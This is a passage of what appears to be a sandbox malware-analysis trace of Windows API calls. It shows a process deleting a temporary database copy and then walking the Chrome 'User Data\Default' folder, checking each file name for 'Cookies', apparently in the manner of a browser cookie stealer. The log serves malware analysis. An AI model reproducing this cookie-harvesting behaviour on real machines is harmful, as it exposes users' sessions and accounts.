lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0163.109] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x64) returned 0x395b8c8 [0163.109] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395b8c8) returned 0x64 [0163.109] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a59d, cbMultiByte=-1, lpWideCharStr=0x395b8c8, cchWideChar=50 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F78.tmp-wal") returned 50 [0163.109] GetFileAttributesExW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F78.tmp-wal" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6f78.tmp-wal"), fInfoLevelId=0x0, lpFileInformation=0x2de7bc | out: lpFileInformation=0x2de7bc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0163.109] GetLastError () returned 0x2 [0163.109] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395b8c8) returned 0x64 [0163.109] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x395b8c8 | out: hHeap=0x2dc0000) returned 1 [0163.109] GetFileSize (in: hFile=0x160, lpFileSizeHigh=0x2de7e8 | out: lpFileSizeHigh=0x2de7e8*=0x0) returned 0x0 [0163.109] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x14c80) returned 0x395c8b0 [0163.110] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395c8b0) returned 0x14c80 [0163.110] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395c8b0) returned 0x14c80 [0163.112] UnlockFileEx (in: hFile=0x160, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1fe, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x2de480 | out: lpOverlapped=0x2de480) returned 1 [0163.112] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x13) returned 0x394bb10 [0163.112] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394bb10) returned 0x13 [0163.112] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x50) returned 0x3929f28 [0163.112] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929f28) returned 0x50 [0163.112] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xa) returned 0x392a9a8 [0163.112] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a9a8) returned 0xa [0163.112] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x80) returned 0x3929f80 [0163.112] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929f80) returned 0x80 [0163.112] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xa) returned 0x392a828 [0163.112] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a828) returned 0xa [0163.112] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe) returned 0x392a798 [0163.112] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a798) returned 0xe [0163.112] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xd) returned 0x392a8b8 [0163.112] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a8b8) returned 0xd [0163.112] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x9) returned 0x392a918 [0163.113] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a918) returned 0x9 [0163.113] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a960 [0163.113] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a960) returned 0x10 [0163.113] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe0) returned 0x392a008 [0163.113] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a008) returned 0xe0 [0163.113] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x3fc) returned 0x3949438 [0163.113] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949438) returned 0x3fc [0163.113] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949438) returned 0x3fc [0163.113] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949438) returned 0x3fc [0163.113] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3949438 | out: hHeap=0x2dc0000) returned 1 [0163.113] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a008) returned 0xe0 [0163.113] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a008 | out: hHeap=0x2dc0000) returned 1 [0163.113] LockFileEx (in: hFile=0x160, dwFlags=0x3, dwReserved=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x2def88 | out: lpOverlapped=0x2def88) returned 1 [0163.113] LockFileEx (in: hFile=0x160, dwFlags=0x1, dwReserved=0x0, nNumberOfBytesToLockLow=0x1fe, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x2def7c | out: lpOverlapped=0x2def7c) returned 1 [0163.113] UnlockFileEx (in: hFile=0x160, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x2def8c | out: lpOverlapped=0x2def8c) returned 1 [0163.113] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a567, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0163.113] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x6c) returned 0x392a008 [0163.113] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a008) returned 0x6c [0163.113] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a567, cbMultiByte=-1, lpWideCharStr=0x392a008, cchWideChar=54 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F78.tmp-journal") returned 54 [0163.113] GetFileAttributesExW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F78.tmp-journal" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6f78.tmp-journal"), fInfoLevelId=0x0, lpFileInformation=0x2def8c | out: lpFileInformation=0x2def8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0163.114] GetLastError () returned 0x2 [0163.114] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a008) returned 0x6c [0163.114] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a008 | out: hHeap=0x2dc0000) returned 1 [0163.114] ReadFile (in: hFile=0x160, lpBuffer=0x2df008, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x2defdc, lpOverlapped=0x2defbc | out: lpBuffer=0x2df008, lpNumberOfBytesRead=0x2defdc*=0x0, lpOverlapped=0x2defbc) returned 0 [0163.114] GetLastError () returned 0x26 [0163.114] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a59d, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0163.114] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x64) returned 0x395b8c8 [0163.114] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395b8c8) returned 0x64 [0163.114] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a59d, cbMultiByte=-1, lpWideCharStr=0x395b8c8, cchWideChar=50 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F78.tmp-wal") returned 50 [0163.114] GetFileAttributesExW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F78.tmp-wal" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6f78.tmp-wal"), fInfoLevelId=0x0, lpFileInformation=0x2def9c | out: lpFileInformation=0x2def9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0163.114] GetLastError () returned 0x2 [0163.114] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395b8c8) returned 0x64 [0163.114] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x395b8c8 | out: hHeap=0x2dc0000) returned 1 [0163.114] GetFileSize (in: hFile=0x160, lpFileSizeHigh=0x2defc8 | out: lpFileSizeHigh=0x2defc8*=0x0) returned 0x0 [0163.114] UnlockFileEx (in: hFile=0x160, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1fe, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x2defb8 | out: lpOverlapped=0x2defb8) returned 1 [0163.114] CloseHandle (hObject=0x160) returned 1 [0163.114] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394c1b8) returned 0x1000 [0163.114] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394c1b8) returned 0x1000 [0163.115] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394c1b8 | out: hHeap=0x2dc0000) returned 1 [0163.115] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395c8b0) returned 0x14c80 [0163.115] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x395c8b0 | out: hHeap=0x2dc0000) returned 1 [0163.115] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929b20) returned 0x400 [0163.115] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929b20 | out: hHeap=0x2dc0000) returned 1 [0163.115] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a5e0) returned 0x74 [0163.115] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a5e0 | out: hHeap=0x2dc0000) returned 1 [0163.115] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a350) returned 0x281 [0163.115] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a350 | out: hHeap=0x2dc0000) returned 1 [0163.115] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a990) returned 0xa [0163.115] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a990 | out: hHeap=0x2dc0000) returned 1 [0163.115] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a930) returned 0xa [0163.115] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a930 | out: hHeap=0x2dc0000) returned 1 [0163.115] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a948) returned 0xe [0163.115] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a948 | out: hHeap=0x2dc0000) returned 1 [0163.115] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a900) returned 0xd [0163.115] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a900 | out: hHeap=0x2dc0000) returned 1 [0163.115] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a8d0) returned 0x9 [0163.115] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a8d0 | out: hHeap=0x2dc0000) returned 1 [0163.115] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b8a0) returned 0x80 [0163.115] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394b8a0 | out: hHeap=0x2dc0000) returned 1 [0163.115] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392aa20) returned 0xe [0163.116] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392aa20 | out: hHeap=0x2dc0000) returned 1 [0163.116] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b848) returned 0x50 [0163.116] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394b848 | out: hHeap=0x2dc0000) returned 1 [0163.116] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a7c8) returned 0x10 [0163.116] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a7c8 | out: hHeap=0x2dc0000) returned 1 [0163.116] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a660) returned 0x54 [0163.116] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a660 | out: hHeap=0x2dc0000) returned 1 [0163.116] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929ac0) returned 0x54 [0163.116] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929ac0 | out: hHeap=0x2dc0000) returned 1 [0163.116] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929a88) returned 0x30 [0163.116] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929a88 | out: hHeap=0x2dc0000) returned 1 [0163.116] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a9a8) returned 0xa [0163.116] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a9a8 | out: hHeap=0x2dc0000) returned 1 [0163.116] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a828) returned 0xa [0163.116] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a828 | out: hHeap=0x2dc0000) returned 1 [0163.116] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a798) returned 0xe [0163.116] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a798 | out: hHeap=0x2dc0000) returned 1 [0163.116] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a8b8) returned 0xd [0163.116] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a8b8 | out: hHeap=0x2dc0000) returned 1 [0163.116] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a918) returned 0x9 [0163.116] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a918 | out: hHeap=0x2dc0000) returned 1 [0163.116] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929f80) returned 0x80 [0163.116] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929f80 | out: hHeap=0x2dc0000) returned 1 [0163.116] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394bb10) returned 0x13 [0163.117] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394bb10 | out: hHeap=0x2dc0000) returned 1 [0163.117] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929f28) returned 0x50 [0163.117] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929f28 | out: hHeap=0x2dc0000) returned 1 [0163.117] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a960) returned 0x10 [0163.117] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a960 | out: hHeap=0x2dc0000) returned 1 [0163.117] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b988) returned 0x22 [0163.117] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394b988 | out: hHeap=0x2dc0000) returned 1 [0163.117] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a840) returned 0x10 [0163.117] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a840 | out: hHeap=0x2dc0000) returned 1 [0163.117] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929a00) returned 0x42 [0163.117] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929a00 | out: hHeap=0x2dc0000) returned 1 [0163.117] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x39299b0) returned 0x43 [0163.117] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x39299b0 | out: hHeap=0x2dc0000) returned 1 [0163.117] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b938) returned 0x43 [0163.117] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394b938 | out: hHeap=0x2dc0000) returned 1 [0163.117] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a858) returned 0x10 [0163.117] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a858 | out: hHeap=0x2dc0000) returned 1 [0163.117] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a870) returned 0x10 [0163.117] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a870 | out: hHeap=0x2dc0000) returned 1 [0163.117] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a888) returned 0x10 [0163.117] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a888 | out: hHeap=0x2dc0000) returned 1 [0163.117] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a6c0) returned 0x54 [0163.117] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a6c0 | out: hHeap=0x2dc0000) returned 1 [0163.117] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392bf70) returned 0x1d4c0 [0163.118] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392bf70 | out: hHeap=0x2dc0000) returned 1 [0163.118] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x39297d0) returned 0x1d8 [0163.118] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x39297d0 | out: hHeap=0x2dc0000) returned 1 [0163.118] DeleteFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F78.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6f78.tmp")) returned 1 [0163.118] VirtualQuery (in: lpAddress=0x925610, lpBuffer=0x2df2b4, dwLength=0x1c | out: lpBuffer=0x2df2b4*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.118] GetProcessHeap () returned 0x8e0000 [0163.118] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925610 | out: hHeap=0x8e0000) returned 1 [0163.118] VirtualQuery (in: lpAddress=0x925550, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.118] GetProcessHeap () returned 0x8e0000 [0163.118] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925550 | out: hHeap=0x8e0000) returned 1 [0163.118] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x83b08a50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x83b08a50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c0b57b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Current Session", cAlternateFileName="CURREN~1")) returned 1 [0163.118] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0163.118] lstrlenW (lpString="\\") returned 1 [0163.118] GetProcessHeap () returned 0x8e0000 [0163.118] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0163.118] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0163.119] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0163.119] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0163.119] lstrlenW (lpString="Current Session") returned 15 [0163.119] GetProcessHeap () returned 0x8e0000 [0163.119] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb8) returned 0x925550 [0163.119] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0163.119] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="Current Session" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Session") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Session" [0163.119] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.119] GetProcessHeap () returned 0x8e0000 [0163.119] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0163.119] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Session", lpSrch="Cookies") returned 0x0 [0163.119] VirtualQuery (in: lpAddress=0x925550, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.119] GetProcessHeap () returned 0x8e0000 [0163.119] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925550 | out: hHeap=0x8e0000) returned 1 [0163.119] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9c3b6860, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c3b6860, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c3b8f70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x126, dwReserved0=0x0, dwReserved1=0x0, cFileName="Current Tabs", cAlternateFileName="CURREN~2")) returned 1 [0163.119] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0163.119] lstrlenW (lpString="\\") returned 1 [0163.119] GetProcessHeap () returned 0x8e0000 [0163.119] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0163.119] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0163.119] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0163.119] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0163.119] lstrlenW (lpString="Current Tabs") returned 12 [0163.119] GetProcessHeap () returned 0x8e0000 [0163.119] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925550 [0163.119] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0163.119] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="Current Tabs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Tabs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Tabs" [0163.119] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.119] GetProcessHeap () returned 0x8e0000 [0163.119] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0163.119] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Tabs", lpSrch="Cookies") returned 0x0 [0163.120] VirtualQuery (in: lpAddress=0x925550, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.120] GetProcessHeap () returned 0x8e0000 [0163.120] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925550 | out: hHeap=0x8e0000) returned 